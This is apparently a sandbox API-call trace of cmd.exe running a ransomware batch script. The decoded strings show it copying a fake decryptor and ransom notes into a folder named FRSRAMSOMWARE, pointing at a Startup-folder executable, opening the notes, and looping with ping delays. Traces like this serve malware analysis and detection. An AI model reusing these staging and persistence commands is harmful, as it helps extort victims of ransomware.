lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0146.599] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0146.599] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0146.600] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.600] GetFileType (hFile=0x2ec) returned 0x1 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0146.600] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0146.600] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0146.600] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.600] GetFileType (hFile=0x2ec) returned 0x1 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0146.600] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0146.600] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0146.600] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.600] GetFileType (hFile=0x2ec) returned 0x1 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0146.600] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0146.600] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0146.600] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.600] GetFileType (hFile=0x2ec) returned 0x1 [0146.600] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0146.601] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0146.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0146.601] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.601] GetFileType (hFile=0x2ec) returned 0x1 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0146.601] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0146.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0146.601] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.601] GetFileType (hFile=0x2ec) returned 0x1 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0146.601] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0146.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0146.601] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.601] GetFileType (hFile=0x2ec) returned 0x1 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0146.601] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0146.601] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0146.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0146.602] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.602] GetFileType (hFile=0x2ec) returned 0x1 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0146.602] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0146.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0146.602] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.602] GetFileType (hFile=0x2ec) returned 0x1 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0146.602] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0146.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0146.602] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.602] GetFileType (hFile=0x2ec) returned 0x1 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0146.602] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0146.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0146.602] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0146.602] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.602] GetFileType (hFile=0x2ec) returned 0x1 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0146.603] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0146.603] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0146.603] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.603] GetFileType (hFile=0x2ec) returned 0x1 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0146.603] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0146.603] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0146.603] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.603] GetFileType (hFile=0x2ec) returned 0x1 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0146.603] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0146.603] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0146.603] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.603] GetFileType (hFile=0x2ec) returned 0x1 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0146.603] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0146.603] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0146.604] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0146.604] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x28 [0146.604] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0146.604] _get_osfhandle (_FileHandle=0) returned 0x24 [0146.604] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0146.604] SetConsoleInputExeNameW () returned 0x1 [0146.604] GetConsoleOutputCP () returned 0x1b5 [0146.604] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0146.604] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.605] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0146.605] _open_osfhandle (_OSFileHandle=0x2ec, _Flags=8) returned 3 [0146.605] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.605] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0146.605] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0146.605] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0146.605] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0146.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0146.605] GetFileType (hFile=0x2ec) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.605] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0146.605] _tell (_FileHandle=3) returned 2512 [0146.605] _close (_FileHandle=3) returned 0 [0146.605] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0146.605] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0146.605] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0146.605] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0146.605] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0146.605] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0146.605] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0146.605] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0146.606] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0146.606] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0146.606] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0146.606] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0146.606] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0146.606] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0146.606] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0146.606] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0146.606] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0146.606] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0146.606] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0146.606] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0146.606] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0146.606] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0146.606] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0146.606] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0146.606] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0146.606] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0146.606] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0146.606] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0146.606] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0146.606] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0146.606] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0146.606] _wcsicmp (_String1="ping", _String2="START") returned -3 [0146.606] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0146.606] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0146.606] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0146.606] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0146.606] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0146.606] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0146.606] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0146.606] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0146.606] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0146.606] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0146.606] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0146.606] SetErrorMode (uMode=0x0) returned 0x0 [0146.606] SetErrorMode (uMode=0x1) returned 0x0 [0146.606] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67ba0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0146.606] SetErrorMode (uMode=0x0) returned 0x1 [0146.606] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.607] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0146.607] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.607] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.607] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0146.607] GetLastError () returned 0x2 [0146.607] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.607] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ff0 [0146.607] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0146.607] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0146.607] GetLastError () returned 0x2 [0146.607] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ab0 [0146.607] FindClose (in: hFindFile=0xd59ab0 | out: hFindFile=0xd59ab0) returned 1 [0146.607] GetFileType (hFile=0x28) returned 0x2 [0146.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0146.608] _dup (_FileHandle=1) returned 3 [0146.608] _close (_FileHandle=1) returned 0 [0146.608] _wcsicmp (_String1="nul", _String2="con") returned 11 [0146.608] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0146.608] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0146.608] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0146.608] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0146.608] SetErrorMode (uMode=0x0) returned 0x0 [0146.608] SetErrorMode (uMode=0x1) returned 0x0 [0146.608] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0146.608] SetErrorMode (uMode=0x0) returned 0x1 [0146.608] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.608] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0146.608] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.608] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.608] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0146.609] GetLastError () returned 0x2 [0146.609] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 